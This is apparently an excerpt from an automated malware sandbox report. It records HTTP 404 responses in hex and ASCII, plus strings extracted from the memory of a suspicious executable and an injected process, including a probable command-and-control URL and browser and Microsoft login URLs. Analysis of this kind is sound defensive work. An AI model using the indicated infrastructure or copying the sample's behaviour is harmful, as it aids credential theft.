            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 17:11:46 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 25 Nov 2024 17:12:12 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 25 Nov 2024 17:12:17 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 25 Nov 2024 17:12:20 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:15 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:17 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:20 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:23 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:35 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:38 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:40 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:43 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4137332421.0000000004A63000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4137332421.0000000004A63000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000003.00000002.4136427268.0000000004212000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000034B2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000003.00000002.4136427268.0000000004212000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000034B2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth%y
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
